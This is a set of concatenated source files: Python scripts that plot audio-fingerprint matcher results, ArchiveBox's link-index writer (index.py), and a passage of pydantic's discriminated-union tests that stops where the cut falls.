"--audiofilterplotpath",
help="path to the audio filter output plot (path)",
required=True,
type=str)
parser.add_argument(
"--pitchplotpath",
help="path to the pitch output plot (path)",
required=True,
type=str)
parser.add_argument(
"--tempoplotpath",
help="path to the tempo output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if path.exists(args.audiofilterplotpath):
print(f"Error: {args.audiofilterplotpath} already exists")
exit(1)
if path.exists(args.pitchplotpath):
print(f"Error: {args.pitchplotpath} already exists")
exit(1)
if path.exists(args.tempoplotpath):
print(f"Error: {args.tempoplotpath} already exists")
exit(1)
create_audio_filter_plot(args.audiofilterplotpath)
create_pitch_plot(args.pitchplotpath)
create_tempo_plot(args.tempoplotpath)
def create_audio_filter_plot(audio_filter_plot_path):
plt.figure(0, figsize=(5, 7.5))
axes = [plt.subplot2grid((2, 1), (0, 0)), plt.subplot2grid((2, 1), (1, 0))]
plt.suptitle(
"Matcher peformance with distorted audio", fontsize=12, y=0.05)
plt.tight_layout(pad=4.0, w_pad=4.0, h_pad=4.0)
indices = np.arange(1, 8)
labels = np.array([
"aecho", "aphaser", "chorus", "clean", "flanger", "highpass", "lowpass"
])
values = np.array([97.55, 97.91, 98.05, 99.36, 97.81, 97.88, 99.21])
aecho, aphaser, chorus, clean, flanger, highpass, lowpass = axes[0].bar(
indices, values)
axes[0].set_xticks(indices)
axes[0].set_xticklabels(labels, rotation=45)
axes[0].set_ylim([95, 100])
axes[0].set_ylabel("Recognition rate in %")
cell_text = np.array([["aecho", "0.8:0.8:1000:0.8"], [
"aphaser", "delay=5.0:speed=2.0"
], ["chorus", "0.7:0.9:55:0.4:0.25:2"], ["clean", "-"],
["flanger", "delay=20:depth=5:regen=10:speed=2"],
["highpass", "f=440"], ["lowpass", "f=440"]])
col_labels = np.array(["filter name", "filter parameter"])
axes[1].xaxis.set_visible(False)
axes[1].yaxis.set_visible(False)
table = axes[1].table(
cellText=cell_text,
colLabels=col_labels,
alpha=0.0,
bbox=None,
colLoc="center",
cellLoc="center",
loc="center",
rasterized=False,
rowLoc="center")
table.auto_set_font_size(False)
table.set_fontsize(6)
table.scale(1, 1.75)
for (line, col), cell in table.get_celld().items():
if line == 0:
cell._text.set_weight("bold")
cell.set_linewidth(0)
cell.set_fill(False)
plt.savefig(audio_filter_plot_path, transparent=True)
def create_pitch_plot(pitch_plot_path):
xs = np.arange(1, 7)
ys1 = np.array([41, 12, 5, 2, 10, 1])
ys2 = np.array([38.29, 24.33, 20.4, 15, 16.3, 13])
create_plot(xs, "Pitch shift (halftones)", ys1, "Recognition rate in %",
ys2, "Average match score",
"Matcher performance with pitch shift", pitch_plot_path)
def create_tempo_plot(tempo_plot_path):
xs = np.array([2.5, 5, 7.5, 10, 12.5, 15])
ys1 = np.array([97, 95, 73, 54, 49, 36])
ys2 = np.array([76.26, 39.14, 26.93, 23.74, 21.24, 20.28])
create_plot(xs, "Tempo increase (percent)", ys1, "Recognition rate in %",
ys2, "Average match score",
"Matcher performance with tempo increase", tempo_plot_path)
def create_plot(xs, xs_label, ys1, ys_label1, ys2, ys_label2, title,
file_name):
figure, axis1 = plt.subplots()
axis1.set_xlabel(xs_label)
axis1.set_ylabel(ys_label1, color="red")
axis1.tick_params(axis='y', labelcolor="red")
handle1, = plt.plot(xs, ys1, "r--", label=ys_label1)
ticks = [tick for tick in plt.gca().get_yticks() if tick >= 0]
plt.gca().set_yticks(ticks)
axis2 = axis1.twinx()
axis2.set_ylabel(ys_label2, color="blue")
axis2.tick_params(axis='y', labelcolor="blue")
handle2, = plt.plot(xs, ys2, "b--", label=ys_label2)
figure.tight_layout(pad=3.0, w_pad=3.0, h_pad=3.0)
figure.suptitle(title, fontsize=12, y=0.05)
plt.legend(handles=[handle1, handle2], loc=1)
plt.savefig(file_name, transparent=True)
if __name__ == "__main__":
main()
```
#### File: scripts/plots/create_dump_plots.py
```python
from argparse import ArgumentParser
from itertools import groupby, islice
from os import listdir
from os.path import isfile, join
import re
from matplotlib import collections as mc, colors, pyplot as plt, rc
import numpy as np
from scipy.io.wavfile import write
def main():
parser = ArgumentParser()
parser.add_argument(
"--signalwav",
action="store_true",
help="generate wav file for signal")
parser.add_argument(
"--signalplot", action="store_true", help="generate plots for signal")
parser.add_argument(
"--spectrogramplot",
action="store_true",
help="generate plots for spectrogram")
parser.add_argument(
"--constellationmapplot",
action="store_true",
help="generate plots for constellation map")
parser.add_argument(
"--peakpairsplot",
action="store_true",
help="generate plots for peak pairs")
parser.add_argument(
"--songoffsetsplot",
action="store_true",
help="generate plots for song offsets")
args = parser.parse_args()
rc("font", family="Arial")
folder = "."
max_time = 80
sample_rate = 8000
width, height = 90, 10
if args.signalwav:
n_output_samples = 80000
signal_pattern = (r"(signal-to-peak-pairs-signal.*|" +
r"signal-to-matches-signal-microphone)\.txt$")
signal_filenames = filenames(folder, signal_pattern)
write_signal_wav(signal_filenames, n_output_samples, sample_rate)
if args.signalplot:
n_shown_samples = 8000
signal_pattern = (r"(signal-to-peak-pairs-signal.*|" +
r"signal-to-matches-signal-microphone)\.txt$")
signal_filenames = filenames(folder, signal_pattern)
write_signal_plot(signal_filenames, n_shown_samples, sample_rate,
width, height)
if args.spectrogramplot:
spectrogram_pattern = (
r"(signal-to-peak-pairs-spectrogram.*|" +
r"signal-to-matches-spectrogram-microphone)\.txt$")
spectrogram_filenames = filenames(folder, spectrogram_pattern)
width, height = 10, 60
write_spectrogram_plot(spectrogram_filenames, max_time, width, height)
if args.constellationmapplot:
constellation_map_pattern = (
r"(signal-to-peak-pairs-constellation-map.*|" +
r"signal-to-matches-constellation-map-microphone)\.txt$")
constellation_map_filenames = filenames(folder,
constellation_map_pattern)
write_constellation_map_plot(constellation_map_filenames, max_time,
width, height)
if args.peakpairsplot:
peak_pairs_pattern = (
r"(signal-to-peak-pairs-peak-pairs.*|" +
r"signal-to-peak-pairs-peak-pairs-microphone)\.txt$")
peak_pairs_filenames = filenames(folder, peak_pairs_pattern)
write_peak_pairs_plot(peak_pairs_filenames, max_time, width, height)
if args.songoffsetsplot:
song_offsets_pattern = (
r"signal-to-matches-song-offsets-" + r"microphone.txt$")
song_offsets_filenames = filenames(folder, song_offsets_pattern)
write_song_offsets_plot(song_offsets_filenames, width, height)
def filenames(folder, pattern):
"""
Returns a list of filenames that correspond to the given pattern
"""
return [
f for f in listdir(folder)
if isfile(join(folder, f)) and re.match(pattern, f)
]
def write_signal_wav(input_filenames, n_output_samples, sample_rate):
"""
Converts sample files to wav files
"""
for signal_filename in input_filenames:
with open(signal_filename) as signal_file:
signal = list(map(int, islice(signal_file, n_output_samples)))
scaled_signal = np.int8(
signal / np.max(np.abs(signal)).astype(float) * 65535)
scaled_signal.byteswap(True)
write(signal_filename + ".wav", sample_rate, scaled_signal)
def write_signal_plot(input_filenames, n_shown_samples, sample_rate, width,
height):
"""
Visualises sample files with a signal plot
"""
for signal_filename in input_filenames:
with open(signal_filename) as signal_file:
signal = list(map(int, islice(signal_file, n_shown_samples)))
time = np.linspace(0, len(signal) / sample_rate, num=len(signal))
plt.figure(1, figsize=(width, height))
plt.title("Signal (sample rate 8000Hz)", fontsize=36)
plt.xlabel("Time (seconds)", fontsize=18)
plt.ylabel("Amplitude (8 bits unsigned)", fontsize=18)
plt.plot(time, signal, color="red")
plt.savefig(signal_filename + ".png")
def write_spectrogram_plot(spectrogram_filenames, max_time, width, height):
"""
Creates a heatmap for spectrogram files
"""
for spectrogram_filename in spectrogram_filenames:
spectrogram = np.loadtxt(spectrogram_filename)[
0:max_time, :].transpose()
normalize = colors.Normalize(0, max(map(max, spectrogram)))
plt.figure(1, figsize=(width, height))
plt.title("Spectrogram", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (range)", fontsize=18)
plt.imshow(
spectrogram,
aspect="auto",
cmap="Reds",
interpolation="nearest",
norm=normalize)
plt.savefig(spectrogram_filename + ".png")
def write_constellation_map_plot(constellation_map_filenames, max_time, width,
height):
"""
Creates a scatter plot for constellation map files
"""
for constellation_map_filename in constellation_map_filenames:
with open(constellation_map_filename) as constellation_map_file:
peaks = list(
filter(
lambda ft: ft[1] <= max_time,
map(lambda tf: [float(n) for n in reversed(tf.split(" "))],
islice(constellation_map_file, 1, None))))
plt.figure(1, figsize=(width, height))
plt.title("Constellation map", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (range)", fontsize=18)
x, y = zip(*peaks)
plt.scatter(x, y)
plt.savefig(constellation_map_filename + ".png")
def write_peak_pairs_plot(peak_pairs_filenames, max_time, width, height):
"""
Visualises peak pairs in a line plot
"""
for peak_pairs_filename in peak_pairs_filenames:
with open(peak_pairs_filename) as peak_pairs_file:
def max_time_filter(f1t1f2t2):
return int(f1t1f2t2[0][1]) <= max_time and int(
f1t1f2t2[1][1]) <= max_time,
def frequency_time_mapper(f1t1f2t2):
return [(f1t1f2t2[0], f1t1f2t2[1]), (f1t1f2t2[2], f1t1f2t2[3])]
peak_pairs = list(
filter(
max_time_filter,
map(frequency_time_mapper, [
l.split(" ") for l in islice(peak_pairs_file, 1, None)
])))
peak_pairs_lines = mc.LineCollection(peak_pairs)
fig, ax = plt.subplots()
fig.set_size_inches(width, height)
ax.add_collection(peak_pairs_lines)
ax.autoscale()
plt.title("Peak pairs", fontsize=36)
plt.xlabel("Time (chunk index)", fontsize=18)
plt.ylabel("Frequency (Hz)", fontsize=18)
plt.savefig(peak_pairs_filename + ".png")
def write_song_offsets_plot(song_offsets_filenames, width, height):
"""
Creates histograms for song offset files
"""
for song_offsets_filename in song_offsets_filenames:
with open(song_offsets_filename) as song_offsets_file:
songname_offsets = groupby(
[l.rsplit(" ", 1) for l in islice(song_offsets_file, 1, None)],
lambda songnameOffset: songnameOffset[0])
plt.figure(1, figsize=(width, height))
plt.title("Song offsets histogram", fontsize=36)
songname_offsets_dict = {}
for songname, offsets in songname_offsets:
songname_offsets_dict[songname] = list(
map(lambda songnameOffset: int(songnameOffset[1]),
list(offsets)))
subplot_index = 1
for songname, offsets in songname_offsets_dict.items():
plt.subplot(1, len(songname_offsets_dict), subplot_index)
offsets_list = [int(o) for o in list(offsets)]
plt.hist(offsets_list, max(offsets_list))
plt.title(songname)
plt.xlabel("Offset (chunk index)", fontsize=18)
plt.ylabel("# occurrences", fontsize=18)
subplot_index += 1
plt.savefig(song_offsets_filename + ".png")
if __name__ == '__main__':
main()
```
#### File: scripts/plots/create_performance_plot.py
```python
from argparse import ArgumentParser
from os import path
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
def main():
parser = ArgumentParser()
parser.add_argument(
"--inputfilepath",
help="path to the input file (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotindexerpath",
help="path to the indexer output plot (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotmatchespath",
help="path to the matches output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if not path.exists(args.inputfilepath):
print(f"Error: {args.inputfilepath} does not exist")
exit(1)
if path.exists(args.outputplotindexerpath):
print(f"Error: {args.outputplotindexerpath} already exists")
exit(1)
if path.exists(args.outputplotmatchespath):
print(f"Error: {args.outputplotmatchespath} already exists")
exit(1)
with open(args.inputfilepath) as input_file:
input_file_contents = list(
map(lambda line: line.strip().split(" "), input_file.readlines()))
plt_index_sizes = list(map(lambda line: line[0], input_file_contents))
plt_index_fingerprints = list(
map(lambda line: line[1], input_file_contents))
plt_indexer_durations = list(
map(lambda line: line[2], input_file_contents))
plt_matcher_durations_averages = list(
map(lambda line: np.average(np.array(line[3:]).astype(np.int)),
input_file_contents))
make_plot(plt_index_sizes, "Index size (# songs)",
plt_index_fingerprints, "# Fingerprints",
plt_indexer_durations, "Indexer duration (ms)",
"Indexer Performance", args.outputplotindexerpath)
make_plot(plt_index_sizes, "Index size (# songs)",
plt_index_fingerprints, "# Fingerprints",
plt_matcher_durations_averages,
"Matcher average duration (ms)", "Matcher Performance",
args.outputplotmatchespath)
def align_yaxis(ax1, v1, ax2, v2):
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
adjust_yaxis(ax2, (y1 - y2) / 2, v2)
adjust_yaxis(ax1, (y2 - y1) / 2, v1)
def adjust_yaxis(ax, ydif, v):
inv = ax.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, ydif))
miny, maxy = ax.get_ylim()
miny, maxy = miny - v, maxy - v
if -miny > maxy or (-miny == maxy and dy > 0):
nminy = miny
nmaxy = miny * (maxy + dy) / (miny + dy)
else:
nmaxy = maxy
nminy = maxy * (miny + dy) / (maxy + dy)
ax.set_ylim(nminy + v, nmaxy + v)
def make_plot(xs, xs_label, ys1, ys_label1, ys2, ys_label2, title, file_name):
figure, axis1 = plt.subplots()
axis1.set_xlabel(xs_label)
axis1.set_ylabel(ys_label1, color="red")
axis1.tick_params(axis='y', labelcolor="red")
handle1, = plt.plot(xs, ys1, "r--", label=ys_label1)
ticks = [tick for tick in plt.gca().get_yticks() if tick >= 0]
plt.gca().set_yticks(ticks)
axis2 = axis1.twinx()
axis2.set_ylabel(ys_label2, color="blue")
axis2.tick_params(axis='y', labelcolor="blue")
handle2, = plt.plot(xs, ys2, "b--", label=ys_label2)
align_yaxis(axis1, 2700, axis2, 5000)
figure.tight_layout(pad=3.0, w_pad=3.0, h_pad=3.0)
figure.suptitle(title, fontsize=12, y=0.05)
plt.legend(handles=[handle1, handle2], loc=1)
plt.savefig(file_name, transparent=True)
if __name__ == "__main__":
main()
```
#### File: scripts/plots/create_recognition_rate_plot.py
```python
from argparse import ArgumentParser
from os import path
import matplotlib
matplotlib.use("Agg")
from itertools import groupby
import matplotlib.pyplot as plt
def main():
parser = ArgumentParser()
parser.add_argument(
"--inputfilepath",
help="path to the input file (path)",
required=True,
type=str)
parser.add_argument(
"--outputplotpath",
help="path to the output plot (path)",
required=True,
type=str)
args = parser.parse_args()
if not path.exists(args.inputfilepath):
print(f"Error: {args.inputfilepath} does not exist")
exit(1)
if path.exists(args.outputplotpath):
print(f"Error: {args.outputplotpath} already exists")
exit(1)
with open(args.inputfilepath) as input_file:
figure, axis = plt.subplots()
figure.suptitle("Matcher recognition rate", fontsize=12, y=0.05)
figure.tight_layout(pad=4.0, w_pad=4.0, h_pad=4.0)
axis.set_xlabel("Relative noise level")
axis.set_ylabel("Recognition rate in %")
input_file_contents = list(
map(lambda line: line.strip().split(" "), input_file.readlines()))
legends = []
xs = sorted(set(map(lambda line: int(line[1]), input_file_contents)))
yss = groupby(input_file_contents, key=lambda line: line[0])
for (clip_length, ys) in yss:
legends.append("Clip Length = " + str(clip_length))
ysi = list(
map(
lambda length_recrate: length_recrate[2],
sorted(
ys,
key=lambda length_recrate: int(length_recrate[1]),
)))
plt.plot(xs, ysi)
plt.legend(legends, loc="best", fancybox=True, framealpha=0)
plt.savefig(args.outputplotpath, transparent=True)
if __name__ == "__main__":
main()
```
|
{
"source": "jean/ArchiveBox",
"score": 2
}
|
#### File: ArchiveBox/archivebox/index.py
```python
import os
import json
from datetime import datetime
from string import Template
try:
from distutils.dir_util import copy_tree
except ImportError:
print('[X] Missing "distutils" python package. To install it, run:')
print(' pip install distutils')
from config import (
OUTPUT_DIR,
TEMPLATES_DIR,
GIT_SHA,
FOOTER_INFO,
)
from util import (
chmod_file,
urlencode,
derived_link_info,
check_link_structure,
check_links_structure,
wget_output_path,
latest_output,
)
from parse import parse_links
from links import validate_links
from logs import (
log_indexing_process_started,
log_indexing_started,
log_indexing_finished,
log_parsing_started,
log_parsing_finished,
)
TITLE_LOADING_MSG = 'Not yet archived...'
### Homepage index for all the links
def write_links_index(out_dir, links, finished=False):
"""create index.html file for a given list of links"""
log_indexing_process_started()
check_links_structure(links)
log_indexing_started(out_dir, 'index.json')
write_json_links_index(out_dir, links)
log_indexing_finished(out_dir, 'index.json')
log_indexing_started(out_dir, 'index.html')
write_html_links_index(out_dir, links, finished=finished)
log_indexing_finished(out_dir, 'index.html')
def load_links_index(out_dir=OUTPUT_DIR, import_path=None):
"""parse and load existing index with any new links from import_path merged in"""
existing_links = []
if out_dir:
existing_links = parse_json_links_index(out_dir)
check_links_structure(existing_links)
new_links = []
if import_path:
# parse and validate the import file
log_parsing_started(import_path)
raw_links, parser_name = parse_links(import_path)
new_links = validate_links(raw_links)
check_links_structure(new_links)
# merge existing links in out_dir and new links
all_links = validate_links(existing_links + new_links)
check_links_structure(all_links)
num_new_links = len(all_links) - len(existing_links)
if import_path and parser_name:
log_parsing_finished(num_new_links, parser_name)
return all_links, new_links
def write_json_links_index(out_dir, links):
"""write the json link index to a given path"""
check_links_structure(links)
path = os.path.join(out_dir, 'index.json')
index_json = {
'info': 'ArchiveBox Index',
'help': 'https://github.com/pirate/ArchiveBox',
'version': GIT_SHA,
'num_links': len(links),
'updated': str(datetime.now().timestamp()),
'links': links,
}
with open(path, 'w', encoding='utf-8') as f:
json.dump(index_json, f, indent=4, default=str)
chmod_file(path)
def parse_json_links_index(out_dir=OUTPUT_DIR):
"""parse a archive index json file and return the list of links"""
index_path = os.path.join(out_dir, 'index.json')
if os.path.exists(index_path):
with open(index_path, 'r', encoding='utf-8') as f:
links = json.load(f)['links']
check_links_structure(links)
return links
return []
def write_html_links_index(out_dir, links, finished=False):
"""write the html link index to a given path"""
check_links_structure(links)
path = os.path.join(out_dir, 'index.html')
copy_tree(os.path.join(TEMPLATES_DIR, 'static'), os.path.join(out_dir, 'static'))
with open(os.path.join(out_dir, 'robots.txt'), 'w+') as f:
f.write('User-agent: *\nDisallow: /')
with open(os.path.join(TEMPLATES_DIR, 'index.html'), 'r', encoding='utf-8') as f:
index_html = f.read()
with open(os.path.join(TEMPLATES_DIR, 'index_row.html'), 'r', encoding='utf-8') as f:
link_row_html = f.read()
full_links_info = (derived_link_info(link) for link in links)
link_rows = '\n'.join(
Template(link_row_html).substitute(**{
**link,
'title': (
link['title']
or (link['base_url'] if link['is_archived'] else TITLE_LOADING_MSG)
),
'favicon_url': (
os.path.join('archive', link['timestamp'], 'favicon.ico')
# if link['is_archived'] else 'data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs='
),
'archive_url': urlencode(
wget_output_path(link) or 'index.html'
),
})
for link in full_links_info
)
template_vars = {
'num_links': len(links),
'date_updated': datetime.now().strftime('%Y-%m-%d'),
'time_updated': datetime.now().strftime('%Y-%m-%d %H:%M'),
'footer_info': FOOTER_INFO,
'git_sha': GIT_SHA,
'short_git_sha': GIT_SHA[:8],
'rows': link_rows,
'status': 'finished' if finished else 'running',
}
with open(path, 'w', encoding='utf-8') as f:
f.write(Template(index_html).substitute(**template_vars))
chmod_file(path)
def patch_links_index(link, out_dir=OUTPUT_DIR):
"""hack to in-place update one row's info in the generated index html"""
title = link['title'] or latest_output(link)['title']
successful = len(tuple(filter(None, latest_output(link).values())))
# Patch JSON index
changed = False
json_file_links = parse_json_links_index(out_dir)
for saved_link in json_file_links:
if saved_link['url'] == link['url']:
saved_link['title'] = title
saved_link['history'] = link['history']
changed = True
break
if changed:
write_json_links_index(out_dir, json_file_links)
# Patch HTML index
html_path = os.path.join(out_dir, 'index.html')
html = open(html_path, 'r').read().split('\n')
for idx, line in enumerate(html):
if title and ('<span data-title-for="{}"'.format(link['url']) in line):
html[idx] = '<span>{}</span>'.format(title)
elif successful and ('<span data-number-for="{}"'.format(link['url']) in line):
html[idx] = '<span>{}</span>'.format(successful)
break
with open(html_path, 'w') as f:
f.write('\n'.join(html))
### Individual link index
def write_link_index(out_dir, link):
link['updated'] = str(datetime.now().timestamp())
write_json_link_index(out_dir, link)
write_html_link_index(out_dir, link)
def write_json_link_index(out_dir, link):
"""write a json file with some info about the link"""
check_link_structure(link)
path = os.path.join(out_dir, 'index.json')
with open(path, 'w', encoding='utf-8') as f:
json.dump(link, f, indent=4, default=str)
chmod_file(path)
def parse_json_link_index(out_dir):
"""load the json link index from a given directory"""
existing_index = os.path.join(out_dir, 'index.json')
if os.path.exists(existing_index):
with open(existing_index, 'r', encoding='utf-8') as f:
link_json = json.load(f)
check_link_structure(link_json)
return link_json
return {}
def load_json_link_index(out_dir, link):
"""check for an existing link archive in the given directory,
and load+merge it into the given link dict
"""
link = {
**parse_json_link_index(out_dir),
**link,
}
link.update({
'history': link.get('history') or {},
})
check_link_structure(link)
return link
def write_html_link_index(out_dir, link):
check_link_structure(link)
with open(os.path.join(TEMPLATES_DIR, 'link_index.html'), 'r', encoding='utf-8') as f:
link_html = f.read()
path = os.path.join(out_dir, 'index.html')
link = derived_link_info(link)
with open(path, 'w', encoding='utf-8') as f:
f.write(Template(link_html).substitute({
**link,
'title': (
link['title']
or (link['base_url'] if link['is_archived'] else TITLE_LOADING_MSG)
),
'archive_url': urlencode(
wget_output_path(link)
or (link['domain'] if link['is_archived'] else 'about:blank')
),
'extension': link['extension'] or 'html',
'tags': link['tags'].strip() or 'untagged',
'status': 'Archived' if link['is_archived'] else 'Not yet archived',
'status_color': 'success' if link['is_archived'] else 'danger',
}))
chmod_file(path)
```
|
{
"source": "JeanArhancet/pydantic",
"score": 2
}
|
#### File: pydantic/tests/test_discrimated_union.py
```python
import re
import sys
from enum import Enum
from typing import Generic, TypeVar, Union
import pytest
from typing_extensions import Annotated, Literal
from pydantic import BaseModel, Field, ValidationError
from pydantic.errors import ConfigError
from pydantic.generics import GenericModel
def test_discriminated_union_only_union():
with pytest.raises(TypeError, match='`discriminator` can only be used with `Union` type'):
class Model(BaseModel):
x: str = Field(..., discriminator='qwe')
def test_discriminated_union_invalid_type():
with pytest.raises(TypeError, match="Type 'str' is not a valid `BaseModel` or `dataclass`"):
class Model(BaseModel):
x: Union[str, int] = Field(..., discriminator='qwe')
def test_discriminated_union_defined_discriminator():
class Cat(BaseModel):
c: str
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
with pytest.raises(ConfigError, match="Model 'Cat' needs a discriminator field for key 'pet_type'"):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(..., discriminator='pet_type')
number: int
def test_discriminated_union_literal_discriminator():
class Cat(BaseModel):
pet_type: int
c: str
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
with pytest.raises(ConfigError, match="Field 'pet_type' of model 'Cat' needs to be a `Literal`"):
class Model(BaseModel):
pet: Union[Cat, Dog] = Field(..., discriminator='pet_type')
number: int
def test_discriminated_union_root_same_discriminator():
class BlackCat(BaseModel):
pet_type: Literal['blackcat']
class WhiteCat(BaseModel):
pet_type: Literal['whitecat']
class Cat(BaseModel):
__root__: Union[BlackCat, WhiteCat]
class Dog(BaseModel):
pet_type: Literal['dog']
with pytest.raises(ConfigError, match="Field 'pet_type' is not the same for all submodels of 'Cat'"):
class Pet(BaseModel):
__root__: Union[Cat, Dog] = Field(..., discriminator='pet_type')
def test_discriminated_union_validation():
class BlackCat(BaseModel):
pet_type: Literal['cat']
color: Literal['black']
black_infos: str
class WhiteCat(BaseModel):
pet_type: Literal['cat']
color: Literal['white']
white_infos: str
class Cat(BaseModel):
__root__: Annotated[Union[BlackCat, WhiteCat], Field(discriminator='color')]
class Dog(BaseModel):
pet_type: Literal['dog']
d: str
class Lizard(BaseModel):
pet_type: Literal['reptile', 'lizard']
l: str
class Model(BaseModel):
pet: Annotated[Union[Cat, Dog, Lizard], Field(discriminator='pet_type')]
number: int
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_typ': 'cat'}, 'number': 'x'})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
{'loc': ('number',), 'msg': 'value is not a valid integer', 'type': 'type_error.integer'},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': 'fish', 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'fish'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': (
"No match for discriminator 'pet_type' and value 'fish' "
"(allowed values: 'cat', 'dog', 'reptile', 'lizard')"
),
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {
'discriminator_key': 'pet_type',
'discriminator_value': 'fish',
'allowed_values': "'cat', 'dog', 'reptile', 'lizard'",
},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'lizard'}, 'number': 2})
assert exc_info.value.errors() == [
{'loc': ('pet', 'Lizard', 'l'), 'msg': 'field required', 'type': 'value_error.missing'},
]
m = Model.parse_obj({'pet': {'pet_type': 'lizard', 'l': 'pika'}, 'number': 2})
assert isinstance(m.pet, Lizard)
assert m.dict() == {'pet': {'pet_type': 'lizard', 'l': 'pika'}, 'number': 2}
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Cat', '__root__', 'WhiteCat', 'white_infos'),
'msg': 'field required',
'type': 'value_error.missing',
}
]
m = Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white', 'white_infos': 'pika'}, 'number': 2})
assert isinstance(m.pet.__root__, WhiteCat)
def test_discriminated_annotated_union():
class BlackCat(BaseModel):
pet_type: Literal['cat']
color: Literal['black']
black_infos: str
class WhiteCat(BaseModel):
pet_type: Literal['cat']
color: Literal['white']
white_infos: str
Cat = Annotated[Union[BlackCat, WhiteCat], Field(discriminator='color')]
class Dog(BaseModel):
pet_type: Literal['dog']
dog_name: str
Pet = Annotated[Union[Cat, Dog], Field(discriminator='pet_type')]
class Model(BaseModel):
pet: Pet
number: int
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_typ': 'cat'}, 'number': 'x'})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "Discriminator 'pet_type' is missing in value",
'type': 'value_error.discriminated_union.missing_discriminator',
'ctx': {'discriminator_key': 'pet_type'},
},
{'loc': ('number',), 'msg': 'value is not a valid integer', 'type': 'type_error.integer'},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'fish'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet',),
'msg': "No match for discriminator 'pet_type' and value 'fish' " "(allowed values: 'cat', 'dog')",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'pet_type', 'discriminator_value': 'fish', 'allowed_values': "'cat', 'dog'"},
},
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'dog'}, 'number': 2})
assert exc_info.value.errors() == [
{'loc': ('pet', 'Dog', 'dog_name'), 'msg': 'field required', 'type': 'value_error.missing'},
]
m = Model.parse_obj({'pet': {'pet_type': 'dog', 'dog_name': 'milou'}, 'number': 2})
assert isinstance(m.pet, Dog)
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'red'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Union[BlackCat, WhiteCat]'),
'msg': "No match for discriminator 'color' and value 'red' " "(allowed values: 'black', 'white')",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'color', 'discriminator_value': 'red', 'allowed_values': "'black', 'white'"},
}
]
with pytest.raises(ValidationError) as exc_info:
Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white'}, 'number': 2})
assert exc_info.value.errors() == [
{
'loc': ('pet', 'Union[BlackCat, WhiteCat]', 'WhiteCat', 'white_infos'),
'msg': 'field required',
'type': 'value_error.missing',
}
]
m = Model.parse_obj({'pet': {'pet_type': 'cat', 'color': 'white', 'white_infos': 'pika'}, 'number': 2})
assert isinstance(m.pet, WhiteCat)
def test_discriminated_union_basemodel_instance_value():
class A(BaseModel):
l: Literal['a']
class B(BaseModel):
l: Literal['b']
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
t = Top(sub=A(l='a'))
assert isinstance(t, Top)
def test_discriminated_union_int():
class A(BaseModel):
l: Literal[1]
class B(BaseModel):
l: Literal[2]
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
assert isinstance(Top.parse_obj({'sub': {'l': 2}}).sub, B)
with pytest.raises(ValidationError) as exc_info:
Top.parse_obj({'sub': {'l': 3}})
assert exc_info.value.errors() == [
{
'loc': ('sub',),
'msg': "No match for discriminator 'l' and value 3 (allowed values: 1, 2)",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {'discriminator_key': 'l', 'discriminator_value': 3, 'allowed_values': '1, 2'},
}
]
def test_discriminated_union_enum():
class EnumValue(Enum):
a = 1
b = 2
class A(BaseModel):
l: Literal[EnumValue.a]
class B(BaseModel):
l: Literal[EnumValue.b]
class Top(BaseModel):
sub: Union[A, B] = Field(..., discriminator='l')
assert isinstance(Top.parse_obj({'sub': {'l': EnumValue.b}}).sub, B)
with pytest.raises(ValidationError) as exc_info:
Top.parse_obj({'sub': {'l': 3}})
assert exc_info.value.errors() == [
{
'loc': ('sub',),
'msg': "No match for discriminator 'l' and value 3 (allowed values: <EnumValue.a: 1>, <EnumValue.b: 2>)",
'type': 'value_error.discriminated_union.invalid_discriminator',
'ctx': {
'discriminator_key': 'l',
'discriminator_value': 3,
'allowed_values': '<EnumValue.a: 1>, <EnumValue.b: 2>',
},
}
]
def test_alias_different():
class Cat(BaseModel):
pet_type: Literal['cat'] = Field(alias='U')
c: str
class Dog(BaseModel):
